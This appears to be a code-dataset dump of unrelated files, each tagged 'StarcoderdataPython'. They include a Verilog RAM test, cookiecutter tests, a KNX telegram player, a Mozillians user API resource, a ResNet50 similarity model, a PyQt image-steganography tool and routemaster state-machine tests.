mem[793] = 32'h19680;
mem[794] = 32'h19700;
mem[795] = 32'h19780;
mem[796] = 32'h19800;
mem[797] = 32'h19880;
mem[798] = 32'h19900;
mem[799] = 32'h19980;
mem[800] = 32'h19a00;
mem[801] = 32'h19a80;
mem[802] = 32'h19b00;
mem[803] = 32'h19b80;
mem[804] = 32'h19c00;
mem[805] = 32'h19c80;
mem[806] = 32'h19d00;
mem[807] = 32'h19d80;
mem[808] = 32'h19e00;
mem[809] = 32'h19e80;
mem[810] = 32'h19f00;
mem[811] = 32'h19f80;
mem[812] = 32'h1a000;
mem[813] = 32'h1a080;
mem[814] = 32'h1a100;
mem[815] = 32'h1a180;
mem[816] = 32'h1a200;
mem[817] = 32'h1a280;
mem[818] = 32'h1a300;
mem[819] = 32'h1a380;
mem[820] = 32'h1a400;
mem[821] = 32'h1a480;
mem[822] = 32'h1a500;
mem[823] = 32'h1a580;
mem[824] = 32'h1a600;
mem[825] = 32'h1a680;
mem[826] = 32'h1a700;
mem[827] = 32'h1a780;
mem[828] = 32'h1a800;
mem[829] = 32'h1a880;
mem[830] = 32'h1a900;
mem[831] = 32'h1a980;
mem[832] = 32'h1aa00;
mem[833] = 32'h1aa80;
mem[834] = 32'h1ab00;
mem[835] = 32'h1ab80;
mem[836] = 32'h1ac00;
mem[837] = 32'h1ac80;
mem[838] = 32'h1ad00;
mem[839] = 32'h1ad80;
mem[840] = 32'h1ae00;
mem[841] = 32'h1ae80;
mem[842] = 32'h1af00;
mem[843] = 32'h1af80;
mem[844] = 32'h1b000;
mem[845] = 32'h1b080;
mem[846] = 32'h1b100;
mem[847] = 32'h1b180;
mem[848] = 32'h1b200;
mem[849] = 32'h1b280;
mem[850] = 32'h1b300;
mem[851] = 32'h1b380;
mem[852] = 32'h1b400;
mem[853] = 32'h1b480;
mem[854] = 32'h1b500;
mem[855] = 32'h1b580;
mem[856] = 32'h1b600;
mem[857] = 32'h1b680;
mem[858] = 32'h1b700;
mem[859] = 32'h1b780;
mem[860] = 32'h1b800;
mem[861] = 32'h1b880;
mem[862] = 32'h1b900;
mem[863] = 32'h1b980;
mem[864] = 32'h1ba00;
mem[865] = 32'h1ba80;
mem[866] = 32'h1bb00;
mem[867] = 32'h1bb80;
mem[868] = 32'h1bc00;
mem[869] = 32'h1bc80;
mem[870] = 32'h1bd00;
mem[871] = 32'h1bd80;
mem[872] = 32'h1be00;
mem[873] = 32'h1be80;
mem[874] = 32'h1bf00;
mem[875] = 32'h1bf80;
mem[876] = 32'h1c000;
mem[877] = 32'h1c080;
mem[878] = 32'h1c100;
mem[879] = 32'h1c180;
mem[880] = 32'h1c200;
mem[881] = 32'h1c280;
mem[882] = 32'h1c300;
mem[883] = 32'h1c380;
mem[884] = 32'h1c400;
mem[885] = 32'h1c480;
mem[886] = 32'h1c500;
mem[887] = 32'h1c580;
mem[888] = 32'h1c600;
mem[889] = 32'h1c680;
mem[890] = 32'h1c700;
mem[891] = 32'h1c780;
mem[892] = 32'h1c800;
mem[893] = 32'h1c880;
mem[894] = 32'h1c900;
mem[895] = 32'h1c980;
mem[896] = 32'h1ca00;
mem[897] = 32'h1ca80;
mem[898] = 32'h1cb00;
mem[899] = 32'h1cb80;
mem[900] = 32'h1cc00;
mem[901] = 32'h1cc80;
mem[902] = 32'h1cd00;
mem[903] = 32'h1cd80;
mem[904] = 32'h1ce00;
mem[905] = 32'h1ce80;
mem[906] = 32'h1cf00;
mem[907] = 32'h1cf80;
mem[908] = 32'h1d000;
mem[909] = 32'h1d080;
mem[910] = 32'h1d100;
mem[911] = 32'h1d180;
mem[912] = 32'h1d200;
mem[913] = 32'h1d280;
mem[914] = 32'h1d300;
mem[915] = 32'h1d380;
mem[916] = 32'h1d400;
mem[917] = 32'h1d480;
mem[918] = 32'h1d500;
mem[919] = 32'h1d580;
mem[920] = 32'h1d600;
mem[921] = 32'h1d680;
mem[922] = 32'h1d700;
mem[923] = 32'h1d780;
mem[924] = 32'h0;
mem[925] = 32'h0;
mem[926] = 32'h0;
mem[927] = 32'h0;
mem[928] = 32'h0;
mem[929] = 32'h0;
mem[930] = 32'h0;
mem[931] = 32'h0;
mem[932] = 32'h0;
mem[933] = 32'h0;
mem[934] = 32'h0;
mem[935] = 32'h0;
mem[936] = 32'h0;
mem[937] = 32'h0;
mem[938] = 32'h0;
mem[939] = 32'h0;
mem[940] = 32'h0;
mem[941] = 32'h0;
mem[942] = 32'h0;
mem[943] = 32'h0;
mem[944] = 32'h0;
mem[945] = 32'h0;
mem[946] = 32'h0;
mem[947] = 32'h0;
mem[948] = 32'h0;
mem[949] = 32'h0;
mem[950] = 32'h0;
mem[951] = 32'h0;
mem[952] = 32'h0;
mem[953] = 32'h0;
mem[954] = 32'h0;
mem[955] = 32'h0;
mem[956] = 32'h0;
mem[957] = 32'h0;
mem[958] = 32'h0;
mem[959] = 32'h0;
mem[960] = 32'h0;
mem[961] = 32'h0;
mem[962] = 32'h0;
mem[963] = 32'h0;
mem[964] = 32'h0;
mem[965] = 32'h0;
mem[966] = 32'h0;
mem[967] = 32'h0;
mem[968] = 32'h0;
mem[969] = 32'h0;
mem[970] = 32'h0;
mem[971] = 32'h0;
mem[972] = 32'h0;
mem[973] = 32'h0;
mem[974] = 32'h0;
mem[975] = 32'h0;
mem[976] = 32'h0;
mem[977] = 32'h0;
mem[978] = 32'h0;
mem[979] = 32'h0;
mem[980] = 32'h0;
mem[981] = 32'h0;
mem[982] = 32'h0;
mem[983] = 32'h0;
mem[984] = 32'h0;
mem[985] = 32'h0;
mem[986] = 32'h0;
mem[987] = 32'h0;
mem[988] = 32'h0;
mem[989] = 32'h0;
mem[990] = 32'h0;
mem[991] = 32'h0;
mem[992] = 32'h0;
mem[993] = 32'h0;
mem[994] = 32'h0;
mem[995] = 32'h0;
mem[996] = 32'h0;
mem[997] = 32'h0;
mem[998] = 32'h0;
mem[999] = 32'h0;
mem[1000] = 32'h0;
mem[1001] = 32'h0;
mem[1002] = 32'h0;
mem[1003] = 32'h0;
mem[1004] = 32'h0;
mem[1005] = 32'h0;
mem[1006] = 32'h0;
mem[1007] = 32'h0;
mem[1008] = 32'h0;
mem[1009] = 32'h0;
mem[1010] = 32'h0;
mem[1011] = 32'h0;
mem[1012] = 32'h0;
mem[1013] = 32'h0;
mem[1014] = 32'h0;
mem[1015] = 32'h0;
mem[1016] = 32'h0;
mem[1017] = 32'h0;
mem[1018] = 32'h0;
mem[1019] = 32'h0;
mem[1020] = 32'h0;
mem[1021] = 32'h0;
mem[1022] = 32'h0;
mem[1023] = 32'h0;
end
always @(posedge CLK) begin
if(myram_0_wenable) begin
mem[myram_0_addr] <= myram_0_wdata;
end
myram_0_daddr <= myram_0_addr;
end
assign myram_0_rdata = mem[myram_0_daddr];
endmodule
"""
def test():
veriloggen.reset()
test_module = thread_fixed_ram_initvals.mkTest()
code = test_module.to_verilog()
from pyverilog.vparser.parser import VerilogParser
from pyverilog.ast_code_generator.codegen import ASTCodeGenerator
parser = VerilogParser()
expected_ast = parser.parse(expected_verilog)
codegen = ASTCodeGenerator()
expected_code = codegen.visit(expected_ast)
assert(expected_code == code)
|
StarcoderdataPython
|
9635427
|
"""Tests for `repository_has_cookiecutter_json` function."""
import pytest
from cookiecutter.repository import repository_has_cookiecutter_json
def test_valid_repository():
"""Validate correct response if `cookiecutter.json` file exist."""
assert repository_has_cookiecutter_json('tests/fixtures/fake-repo')
@pytest.mark.parametrize(
'invalid_repository', (['tests/fixtures/fake-repo-bad', 'tests/unknown-repo'])
)
def test_invalid_repository(invalid_repository):
"""Validate correct response if `cookiecutter.json` file not exist."""
assert not repository_has_cookiecutter_json(invalid_repository)
@pytest.mark.parametrize(
'valid_repository',
(['tests/fixtures/valid/nuki-input', 'tests/fixtures/valid/yaml-input']),
)
def test_valid_repositories_yaml_nuki(valid_repository):
"""Validate generic reader works properly."""
assert repository_has_cookiecutter_json(valid_repository)
|
StarcoderdataPython
|
176505
|
<filename>player.py
#!/usr/bin/env python3
import argparse
from datetime import datetime
import json
from ctypes import CDLL, CFUNCTYPE, POINTER, c_int, c_void_p, c_uint, c_ubyte, pointer, create_string_buffer
import pika
from src.telegram import Telegram
ARGS = argparse.ArgumentParser(description="Sends received messages on the KNX bus. If the argument 'device' is missing, the debug mode will be used which means no telegrams will be sent to the KNX bus, they will only be output to stdout.",
formatter_class=argparse.ArgumentDefaultsHelpFormatter)
ARGS.add_argument('-p', '--player', action='store', dest='player_id', type=int, help='player id', required=True)
ARGS.add_argument('-q', '--queue', action='store', dest='queue_ip', type=str, help='queue ip', required=True)
ARGS.add_argument('-d', '--device', action='store', dest='device_index', type=int, help='device index (usually 0)', required=False)
kdrive = CDLL('/usr/local/lib/libkdriveExpress.so')
DEBUG = False
# the error callback pointer to function type
ERROR_CALLBACK = CFUNCTYPE(None, c_int, c_void_p)
# the event callback pointer to function type
EVENT_CALLBACK = CFUNCTYPE(None, c_int, c_uint, c_void_p)
# acccess port descriptor
ap = None
def telegram_received(channel, method, properties, body):
t = Telegram(**json.loads(body.decode('ascii')))
cemi = bytes(t.pack())
timestamp = datetime.now().strftime("%Y-%m-%d %H:%M:%S.%f")
print("{0} {1}".format(timestamp, cemi.hex()))
# cemi= b'\x11\x00\xBC\xE0\x35\x25\x12\x04\x01\x00\x81'
if not DEBUG:
kdrive.kdrive_ap_send(ap, cemi, len(cemi))
def main():
global ap, DEBUG
args = ARGS.parse_args()
print("Starting traffic-player using player id {0}".format(args.player_id))
DEBUG = args.device_index is None
if not DEBUG:
print("Starting live mode...")
start_live_mode(args)
else:
print("No device index given, starting debug mode...")
start_debug_mode(args)
def start_live_mode(args):
global ap
# Configure the logging level
kdrive.kdrive_logger_set_level(0)
# We register an error callback as a convenience logger function to
# print out the error message when an error occurs.
error_callback = ERROR_CALLBACK(on_error_callback)
kdrive.kdrive_register_error_callback(error_callback, None)
# We create a Access Port descriptor. This descriptor is then used for
# all calls to that specific access port.
ap = kdrive.kdrive_ap_create()
# We check that we were able to allocate a new descriptor
# This should always happen, unless a bad_alloc exception is internally thrown
# which means the memory couldn't be allocated.
if ap == -1:
print('Unable to create access port')
return
# We register an event callback to notify of the Access Port Events
# For example: KDRIVE_EVENT_TERMINATED
event_callback = EVENT_CALLBACK(on_event_callback)
kdrive.kdrive_set_event_callback(ap, event_callback, None)
iface_count = kdrive.kdrive_ap_enum_usb(ap)
print('Found {0} KNX USB Interfaces'.format(iface_count))
if ((iface_count > 0) and (kdrive.kdrive_ap_open_usb(ap, args.device_index) == 0)):
print("Using device with index {0}".format(args.device_index))
# Connect the Packet Trace logging mechanism to see the Rx and Tx packets
# kdrive.kdrive_ap_packet_trace_connect(ap)
try:
connection = pika.BlockingConnection(pika.ConnectionParameters(args.queue_ip))
channel = connection.channel()
name = 'traffic-player-{0}'.format(args.player_id)
channel.queue_declare(queue=name)
channel.basic_consume(name, telegram_received, auto_ack=True)
print('Waiting for messages. To exit press CTRL+C')
channel.start_consuming()
except KeyboardInterrupt:
channel.stop_consuming()
finally:
# close the access port
kdrive.kdrive_ap_close(ap)
# close the connection
connection.close()
else:
print('No KNX USB Interfaces found, exiting...')
# releases the access port
kdrive.kdrive_ap_release(ap)
def start_debug_mode(args):
try:
connection = pika.BlockingConnection(pika.ConnectionParameters(args.queue_ip))
channel = connection.channel()
name = 'traffic-player-{0}'.format(args.player_id)
channel.queue_declare(queue=name)
channel.basic_consume(name, telegram_received, auto_ack=True)
print('Waiting for messages. To exit press CTRL+C')
channel.start_consuming()
except KeyboardInterrupt:
channel.stop_consuming()
finally:
# close the connection
connection.close()
def on_error_callback(e, user_data):
len = 1024
str = create_string_buffer(len)
kdrive.kdrive_get_error_message(e, str, len)
print('kdrive error {0} {1}'.format(hex(e), str.value))
def on_event_callback(ap, e, user_data):
pass
if __name__ == '__main__':
main()
|
StarcoderdataPython
|
9731114
|
from urllib2 import unquote
from urlparse import urljoin
from django.conf import settings
from django.core.urlresolvers import reverse
from django.db.models import Q
from funfactory import utils
from tastypie import fields, http
from tastypie.authorization import ReadOnlyAuthorization
from tastypie.bundle import Bundle
from tastypie.exceptions import ImmediateHttpResponse
from tastypie.resources import ModelResource
from tastypie.serializers import Serializer
from mozillians.api.v1.authenticators import AppAuthentication
from mozillians.api.v1.paginator import Paginator
from mozillians.api.v1.resources import (ClientCacheResourceMixIn,
GraphiteMixIn)
from mozillians.users.models import GroupMembership, UserProfile
class UserResource(ClientCacheResourceMixIn, GraphiteMixIn, ModelResource):
"""User Resource."""
email = fields.CharField(attribute='user__email', null=True, readonly=True)
username = fields.CharField(attribute='user__username', null=True, readonly=True)
vouched_by = fields.IntegerField(attribute='vouched_by__id',
null=True, readonly=True)
date_vouched = fields.DateTimeField(attribute='date_vouched', null=True, readonly=True)
groups = fields.CharField()
skills = fields.CharField()
languages = fields.CharField()
url = fields.CharField()
accounts = fields.CharField()
city = fields.CharField(attribute='geo_city__name', null=True, readonly=True, default='')
region = fields.CharField(attribute='geo_region__name', null=True, readonly=True, default='')
country = fields.CharField(attribute='geo_country__code', null=True, readonly=True, default='')
photo_thumbnail = fields.CharField()
class Meta:
queryset = UserProfile.objects.all()
authentication = AppAuthentication()
authorization = ReadOnlyAuthorization()
serializer = Serializer(formats=['json', 'jsonp'])
paginator_class = Paginator
cache_control = {'max-age': 0}
list_allowed_methods = ['get']
detail_allowed_methods = ['get']
resource_name = 'users'
restrict_fields = False
restricted_fields = ['email', 'is_vouched']
fields = ['id', 'full_name', 'is_vouched', 'vouched_by',
'date_vouched', 'groups', 'skills',
'bio', 'photo', 'ircname', 'country', 'region', 'city',
'date_mozillian', 'timezone', 'email', 'allows_mozilla_sites',
'allows_community_sites']
def build_filters(self, filters=None):
database_filters = {}
valid_filters = [f for f in filters if f in
['email', 'country', 'region', 'city', 'ircname',
'username', 'groups', 'skills',
'is_vouched', 'name', 'accounts']]
getvalue = lambda x: unquote(filters[x].lower())
if 'accounts' in valid_filters:
database_filters['accounts'] = Q(
externalaccount__identifier__icontains=getvalue('accounts'))
if 'email' in valid_filters:
database_filters['email'] = Q(
user__email__iexact=getvalue('email'))
if 'username' in valid_filters:
database_filters['username'] = Q(
user__username__iexact=getvalue('username'))
if 'name' in valid_filters:
database_filters['name'] = Q(full_name__iexact=getvalue('name'))
if 'is_vouched' in valid_filters:
value = getvalue('is_vouched')
if value == 'true':
database_filters['is_vouched'] = Q(is_vouched=True)
elif value == 'false':
database_filters['is_vouched'] = Q(is_vouched=False)
if 'country' in valid_filters:
database_filters['country'] = Q(geo_country__code=getvalue('country'))
if 'region' in valid_filters:
database_filters['region'] = Q(geo_region__name=getvalue('region'))
if 'city' in valid_filters:
database_filters['city'] = Q(geo_city__name=getvalue('city'))
if 'ircname' in valid_filters:
database_filters['ircname'] = Q(
**{'{0}__iexact'.format('ircname'):
getvalue('ircname')})
if 'groups' in valid_filters:
kwargs = {
'groups__name__in': getvalue('groups').split(','),
'groupmembership__status': GroupMembership.MEMBER
}
database_filters['groups'] = Q(**kwargs)
if 'skills' in valid_filters:
database_filters['skills'] = Q(skills__name__in=getvalue('skills').split(','))
return database_filters
def dehydrate(self, bundle):
if (bundle.request.GET.get('restricted', False)
or not bundle.data['allows_mozilla_sites']):
data = {}
for key in self._meta.restricted_fields:
data[key] = bundle.data[key]
bundle = Bundle(obj=bundle.obj, data=data, request=bundle.request)
return bundle
def dehydrate_accounts(self, bundle):
accounts = [{'identifier': a.identifier, 'type': a.type}
for a in bundle.obj.externalaccount_set.all()]
return accounts
def dehydrate_groups(self, bundle):
groups = bundle.obj.groups.values_list('name', flat=True)
return list(groups)
def dehydrate_skills(self, bundle):
skills = bundle.obj.skills.values_list('name', flat=True)
return list(skills)
def dehydrate_languages(self, bundle):
languages = bundle.obj.languages.values_list('code', flat=True)
return list(languages)
def dehydrate_photo(self, bundle):
if bundle.obj.photo:
return urljoin(settings.SITE_URL, bundle.obj.photo.url)
return ''
def dehydrate_photo_thumbnail(self, bundle):
return urljoin(settings.SITE_URL, bundle.obj.get_photo_url())
def dehydrate_url(self, bundle):
url = reverse('phonebook:profile_view',
args=[bundle.obj.user.username])
return utils.absolutify(url)
def get_detail(self, request, **kwargs):
if request.GET.get('restricted', False):
raise ImmediateHttpResponse(response=http.HttpForbidden())
return super(UserResource, self).get_detail(request, **kwargs)
def apply_filters(self, request, applicable_filters):
if (request.GET.get('restricted', False)
and 'email' not in applicable_filters
and len(applicable_filters) != 1):
raise ImmediateHttpResponse(response=http.HttpForbidden())
mega_filter = Q()
for db_filter in applicable_filters.values():
mega_filter &= db_filter
if request.GET.get('restricted', False):
mega_filter &= Q(allows_community_sites=True)
return UserProfile.objects.complete().filter(mega_filter).distinct().order_by('id')
|
StarcoderdataPython
|
3404849
|
<reponame>nhoffman/uwgroups
"""Create a connection - useful mainly for testing credentials
"""
import logging
from uwgroups.api import UWGroups
from uwgroups.subcommands import find_credentials
log = logging.getLogger(__name__)
def build_parser(parser):
pass
def action(args):
certfile, keyfile = find_credentials(args)
with UWGroups(certfile, keyfile, environment=args.environment) as conn:
for attr in ['host', 'port']:
print(('{}: {}'.format(attr, getattr(conn.connection, attr))))
for attr in ['certfile', 'keyfile']:
print(('{}: {}'.format(attr, getattr(conn, attr))))
print(('admin users defined by cert: {}'.format(conn.admins)))
print('ok')
|
StarcoderdataPython
|
8010147
|
# Copyright 2021 The TensorFlow Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"ResNet50 backbone for similarity learning"
import re
from typing import Tuple
from tensorflow.keras import layers
from tensorflow.keras.applications import resnet50
from tensorflow_similarity.layers import MetricEmbedding
from tensorflow_similarity.layers import GeneralizedMeanPooling2D
from tensorflow_similarity.models import SimilarityModel
# Create an image augmentation pipeline.
def ResNet50Sim(
input_shape: Tuple[int],
embedding_size: int = 128,
weights: str = "imagenet",
trainable: str = "frozen",
l2_norm: bool = True,
include_top: bool = True,
pooling: str = "gem",
gem_p=1.0,
) -> SimilarityModel:
"""Build an ResNet50 Model backbone for similarity learning
Architecture from [Deep Residual Learning for Image Recognition](https://arxiv.org/abs/1512.03385)
Args:
input_shape: Size of the image input prior to augmentation,
must be bigger than the size of ResNet version you use. See below for
min input size of 244.
embedding_size: Size of the output embedding. Usually between 64
and 512. Defaults to 128.
weights: Use pre-trained weights - the only available currently being
imagenet. Defaults to "imagenet".
trainable: Make the ResNet backbone fully trainable or partially
trainable.
- "full" to make the entire backbone trainable,
- "partial" to only make the last conv5_block trainable
- "frozen" to make it not trainable.
l2_norm: If True and include_top is also True, then
tfsim.layers.MetricEmbedding is used as the last layer, otherwise
keras.layers.Dense is used. This should be true when using cosine
distance. Defaults to True.
include_top: Whether to include the fully-connected layer at the top
of the network. Defaults to True.
pooling: Optional pooling mode for feature extraction when
include_top is False. Defaults to gem.
- None means that the output of the model will be the 4D tensor
output of the last convolutional layer.
- avg means that global average pooling will be applied to the
output of the last convolutional layer, and thus the output of the
model will be a 2D tensor.
- max means that global max pooling will be applied.
- gem means that global GeneralizedMeanPooling2D will be applied.
The gem_p param sets the contrast amount on the pooling.
gem_p: Sets the power in the GeneralizedMeanPooling2D layer. A value
of 1.0 is equivelent to GlobalMeanPooling2D, while larger values
will increase the contrast between activations within each feature
map, and a value of math.inf will be equivelent to MaxPool2d.
"""
# input
inputs = layers.Input(shape=input_shape)
x = inputs
x = build_resnet(x, weights, trainable)
if include_top:
x = GeneralizedMeanPooling2D(p=gem_p, name="gem_pool")(x)
if l2_norm:
outputs = MetricEmbedding(embedding_size)(x)
else:
outputs = layers.Dense(embedding_size)(x)
else:
if pooling == "gem":
x = GeneralizedMeanPooling2D(p=gem_p, name="gem_pool")(x)
elif pooling == "avg":
x = layers.GlobalAveragePooling2D(name="avg_pool")(x)
elif pooling == "max":
x = layers.GlobalMaxPooling2D(name="max_pool")(x)
outputs = x
return SimilarityModel(inputs, outputs)
def build_resnet(x: layers.Layer, weights: str, trainable: str) -> layers.Layer:
"""Build the requested ResNet.
Args:
x: The input layer to the ResNet.
weights: Use pre-trained weights - the only available currently being
imagenet.
trainable: Make the ResNet backbone fully trainable or partially
trainable.
- "full" to make the entire backbone trainable,
- "partial" to only make the last conv5_block trainable
- "frozen" to make it not trainable.
Returns:
The ouptut layer of the ResNet model
"""
# init
resnet = resnet50.ResNet50(weights=weights, include_top=False)
if trainable == "full":
resnet.trainable = True
elif trainable == "partial":
# let's mark the top part of the network as trainable
resnet.trainable = True
for layer in resnet.layers:
# Freeze all the layers before the the last 3 blocks
if not re.search("^conv5|^top", layer.name):
layer.trainable = False
# don't change the batchnorm weights
if isinstance(layer, layers.BatchNormalization):
layer.trainable = False
elif trainable == "frozen":
resnet.trainable = False
else:
raise ValueError(
f"{trainable} is not a supported option for 'trainable'."
)
# wire
x = resnet(x)
return x
|
StarcoderdataPython
|
1803863
|
<reponame>SergeyYaroslawzew/ImagesShifrator
from PyQt5.QtGui import *
from PyQt5.QtCore import *
from PyQt5.QtWidgets import *
from PIL.Image import*
from PIL.ImageDraw import*
from os import listdir
import gui
class Main(QDialog, gui.Ui_Dialog):
def __init__(self):
super().__init__()
self.setupUi(self)
self.images = "images"
self.results = "results"
self.root = "SHIFRATOR"
for i in os.listdir(f"{self.root}\{self.images}"):
self.comboBox.addItem(i)
self.comboBox.activated[str].connect(self.draw)
self.pushButton.clicked.connect(self.encrypt)
self.pushButton_1.clicked.connect(self.decrypt)
def draw(self):
self.file = f"{self.root}\{self.images}\{self.comboBox.currentText()}"
if self.comboBox.currentText() in os.listdir(f"{self.root}\{self.images}"):
pixmap = QPixmap(self.file)
self.label_2.setPixmap(pixmap)
else:
self.label_2.setText("NO SUCH FILE")
def binmessage(self,data):
binmes = []
for i in data:
binmes.append(format(ord(i.encode('cp1251')), '08b'))
return binmes
def NewPix(self,pix,data):
datalist = self.binmessage(data)
lendata = len(datalist)
imdata = iter(pix)
for i in range(lendata):
pix = [value for value in imdata.__next__()[:3] +
imdata.__next__()[:3] +
imdata.__next__()[:3]]
for j in range(0, 8):
if (datalist[i][j]=='0') and (pix[j]% 2 != 0):
if (pix[j]% 2 != 0):
pix[j] -= 1
elif (datalist[i][j] == '1') and (pix[j] % 2 == 0):
pix[j] -= 1
if (i == lendata - 1):
if (pix[-1] % 2 == 0):
pix[-1] -= 1
else:
if (pix[-1] % 2 != 0):
pix[-1] -= 1
pix = tuple(pix)
yield pix[0:3]
yield pix[3:6]
yield pix[6:9]
def encode(self,data):
image = Image.open(self.file, 'r')
self.newname = f"#{self.comboBox.currentText()}"
newimg = image.copy()
w = newimg.size[0]
(x, y) = (0, 0)
for pixel in self.NewPix(newimg.getdata(),data):
newimg.putpixel((x, y), pixel)
if (x == w - 1):
x = 0
y += 1
else:
x += 1
newimg.save(f"{self.root}\{self.results}\{self.newname}")
def encrypt(self):
data = self.lineEdit.text()
if self.comboBox.currentText() in os.listdir(f"{self.root}\{self.images}"):
if self.lineEdit.text() == "":
self.label_2.setText("PLEASE ENTER A MESSAGE")
else:
self.draw()
self.encode(data)
else:
self.label_2.setText("NO SUCH FILE")
def decode(self):
image = Image.open(self.file, 'r')
imgdata = iter(image.getdata())
data = ''
while (True):
pixels = [value for value in imgdata.__next__()[:3] +
imgdata.__next__()[:3] +
imgdata.__next__()[:3]]
binstr = ''
for i in pixels[:8]:
if (i % 2 == 0):
binstr += '0'
else:
binstr += '1'
data += chr(int(binstr, 2))
if (pixels[-1] % 2 != 0):
data = str(data)
data = data.encode('cp1252').decode('cp1251')
return self.lineEdit.setText(f'{data}')
def decrypt(self):
if self.comboBox.currentText() in os.listdir(f"{self.root}\{self.images}"):
self.draw()
self.decode()
else:
self.label_2.setText("NO SUCH FILE")
if __name__ == '__main__':
app = QApplication(sys.argv)
form = Main()
form.show()
app.exec()
|
StarcoderdataPython
|
1995298
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11 on 2017-04-23 11:17
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('offer', '0004_auto_20170415_1518'),
]
operations = [
migrations.AlterField(
model_name='conditionaloffer',
name='benefit',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='offers', to='offer.Benefit', verbose_name='Benefit'),
),
migrations.AlterField(
model_name='conditionaloffer',
name='condition',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='offers', to='offer.Condition', verbose_name='Condition'),
),
]
|
StarcoderdataPython
|
8015231
|
<reponame>thread/routemaster
from unittest import mock
import pytest
from freezegun import freeze_time
from requests.exceptions import RequestException
from routemaster import state_machine
from routemaster.db import Label
from routemaster.state_machine import (
LabelRef,
DeletedLabel,
UnknownLabel,
UnknownStateMachine,
)
from routemaster.state_machine.gates import process_gate
def metadata_triggers_processed(app, label):
with app.new_session():
return app.session.query(
Label.metadata_triggers_processed,
).filter_by(
name=label.name,
state_machine=label.state_machine,
).scalar()
def test_label_get_state(app, mock_test_feed):
label = LabelRef('foo', 'test_machine')
with mock_test_feed(), app.new_session():
state_machine.create_label(
app,
label,
{'foo': 'bar'},
)
with app.new_session():
assert state_machine.get_label_state(app, label).name == 'start'
def test_label_get_state_raises_for_unknown_label(app):
label = LabelRef('unknown', 'test_machine')
with pytest.raises(UnknownLabel), app.new_session():
assert state_machine.get_label_state(app, label)
def test_label_get_state_raises_for_unknown_state_machine(app):
label = LabelRef('foo', 'unknown_machine')
with pytest.raises(UnknownStateMachine), app.new_session():
assert state_machine.get_label_state(app, label)
def test_state_machine_simple(app, mock_test_feed):
label = LabelRef('foo', 'test_machine')
with mock_test_feed(), app.new_session():
state_machine.create_label(
app,
label,
{},
)
state_machine.update_metadata_for_label(
app,
label,
{'foo': 'bar'},
)
with app.new_session():
assert state_machine.get_label_metadata(app, label) == {'foo': 'bar'}
def test_update_metadata_for_label_raises_for_unknown_state_machine(app):
label = LabelRef('foo', 'nonexistent_machine')
with pytest.raises(UnknownStateMachine), app.new_session():
state_machine.update_metadata_for_label(app, label, {})
def test_state_machine_progresses_on_update(app, mock_webhook, mock_test_feed, current_state):
label = LabelRef('foo', 'test_machine')
with mock_test_feed(), app.new_session():
state_machine.create_label(
app,
label,
{},
)
assert current_state(label) == 'start'
with mock_webhook() as webhook, mock_test_feed(), app.new_session():
state_machine.update_metadata_for_label(
app,
label,
{'should_progress': True},
)
webhook.assert_called_once()
assert metadata_triggers_processed(app, label) is True
assert current_state(label) == 'end'
def test_state_machine_progresses_automatically(app, mock_webhook, mock_test_feed, current_state):
label = LabelRef('foo', 'test_machine')
with mock_webhook() as webhook, mock_test_feed(), app.new_session():
state_machine.create_label(
app,
label,
{'should_progress': True},
)
webhook.assert_called_once()
assert current_state(label) == 'end'
def test_state_machine_does_not_progress_when_not_eligible(app, mock_test_feed, current_state):
label = LabelRef('foo', 'test_machine')
with mock_test_feed(), app.new_session():
state_machine.create_label(
app,
label,
{},
)
assert current_state(label) == 'start'
with mock_test_feed(), app.new_session():
state_machine.update_metadata_for_label(
app,
label,
{'should_progress': False},
)
assert current_state(label) == 'start'
def test_stays_in_gate_if_gate_processing_fails(app, mock_test_feed, current_state):
label = LabelRef('foo', 'test_machine')
with mock_test_feed(), app.new_session():
state_machine.create_label(
app,
label,
{},
)
assert current_state(label) == 'start'
with mock_test_feed(), mock.patch(
'routemaster.context.Context._pre_warm_feeds',
side_effect=RequestException,
), app.new_session():
state_machine.update_metadata_for_label(
app,
label,
{'should_progress': True},
)
assert metadata_triggers_processed(app, label) is False
assert current_state(label) == 'start'
def test_concurrent_metadata_update_gate_evaluations_dont_race(create_label, app, assert_history, current_state):
test_machine_2 = app.config.state_machines['test_machine_2']
gate_1 = test_machine_2.states[0]
label = create_label('foo', 'test_machine_2', {})
with app.new_session():
state_machine.update_metadata_for_label(
app,
label,
{'should_progress': True},
)
assert current_state(label) == 'gate_2'
with mock.patch(
'routemaster.state_machine.api.needs_gate_evaluation_for_metadata_change',
return_value=(True, gate_1),
), app.new_session():
state_machine.update_metadata_for_label(
app,
label,
{'should_progress': True},
)
assert_history([
(None, 'gate_1'),
('gate_1', 'gate_2'),
])
def test_metadata_update_gate_evaluations_dont_process_subsequent_metadata_triggered_gate(create_label, app, assert_history, current_state):
label = create_label('foo', 'test_machine_2', {})
with app.new_session():
state_machine.update_metadata_for_label(
app,
label,
{'should_progress': True},
)
assert current_state(label) == 'gate_2'
assert_history([
(None, 'gate_1'),
('gate_1', 'gate_2'),
# Note: has not progressed to end because there is no on entry trigger
# on gate 2 and we were not processing a metadata trigger on gate 2,
# only gate 1.
])
def test_metadata_update_gate_evaluations_dont_race_processing_subsequent_metadata_triggered_gate(create_label, app, assert_history):
test_machine_2 = app.config.state_machines['test_machine_2']
gate_1 = test_machine_2.states[0]
gate_2 = test_machine_2.states[1]
label = create_label('foo', 'test_machine_2', {})
with mock.patch(
'routemaster.state_machine.api.needs_gate_evaluation_for_metadata_change',
return_value=(True, gate_1),
), mock.patch(
'routemaster.state_machine.api.get_current_state',
return_value=gate_2,
), app.new_session():
state_machine.update_metadata_for_label(
app,
label,
{'should_progress': True},
)
# We should have no history entry 1->2 (as we mocked out the current state)
# so the state machine should have considered us up-to-date and not moved.
assert_history([
(None, 'gate_1'),
])
def test_maintains_updated_field_on_label(app, mock_test_feed):
label = LabelRef('foo', 'test_machine')
with mock_test_feed(), app.new_session():
state_machine.create_label(
app,
label,
{},
)
first_updated = app.session.query(
Label.updated,
